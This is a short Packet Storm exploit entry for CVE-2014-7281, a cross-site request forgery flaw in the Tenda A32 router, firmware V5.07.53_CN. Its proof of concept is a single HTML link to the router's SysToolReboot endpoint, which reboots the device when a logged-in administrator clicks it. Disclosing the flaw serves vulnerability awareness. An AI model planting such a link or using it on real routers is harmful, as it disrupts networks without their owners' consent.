Tenda A32 Cross Site Request Forgery

2014-10-15T00:00:00
ID PACKETSTORM:128671
Type packetstorm
Reporter zixian
Modified 2014-10-15T00:00:00

Description

                                        
                                            `# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)  
# CVE ID :CVE-2014-7281  
# Date: 2014-10-10  
# Exploit Author: zixian  
# Vendor Homepage: http://tenda.com.cn/  
# Software Link: http://tenda.com.cn/Catalog/Product/325  
# Version: V5.07.53_CN  
  
  
  
When the administrator login, click on the link below, the device will reboot。  
  
  
<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>  
  
`